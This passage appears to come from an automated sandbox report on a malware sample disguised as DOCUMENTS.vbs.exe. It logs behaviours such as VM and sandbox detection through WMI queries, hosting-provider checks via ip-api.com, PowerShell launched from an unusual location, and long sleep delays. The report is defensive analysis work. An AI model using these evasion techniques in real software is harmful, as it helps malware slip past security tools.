Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe	Key value queried: Powershell behavior
Source: c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe	Key value queried: Powershell behavior
Source: c:\users\user\desktop\documents.vbs.exe	Key value queried: Powershell behavior	Jump to behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 5170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory allocated: 5220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory allocated: 5220000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D00000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797884	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797769	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797646	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799929
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798775
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798546
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797745
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797528
